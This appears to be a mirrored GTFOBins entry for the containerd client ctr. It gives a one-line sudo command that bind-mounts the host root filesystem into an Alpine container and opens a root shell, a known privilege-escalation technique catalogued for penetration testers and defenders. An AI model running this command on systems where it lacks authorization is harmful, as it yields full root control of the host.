mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-26 06:49:44 +01:00
9 lines
287 B
Plaintext
9 lines
287 B
Plaintext
---
|
|
functions:
|
|
sudo:
|
|
- description: |
|
|
If ctr sudo permissions, you can use it to escape to a root shell. It is necessary to add an existing image.
|
|
- code: |
|
|
sudo /usr/bin/ctr run --mount type=bind,src=/,dst=/,options=rbind -t docker.io/library/alpine:latest bash
|
|
---
|